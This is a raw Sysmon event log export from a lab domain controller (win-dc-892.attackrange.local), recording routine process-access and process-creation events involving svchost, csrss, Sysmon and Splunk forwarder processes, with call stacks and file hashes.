12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-647F-6064-5200-00000000AE01}37443748C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.964{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.908{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.908{266CAFBE-647F-6064-5100-00000000AE01}40003996C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.658{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
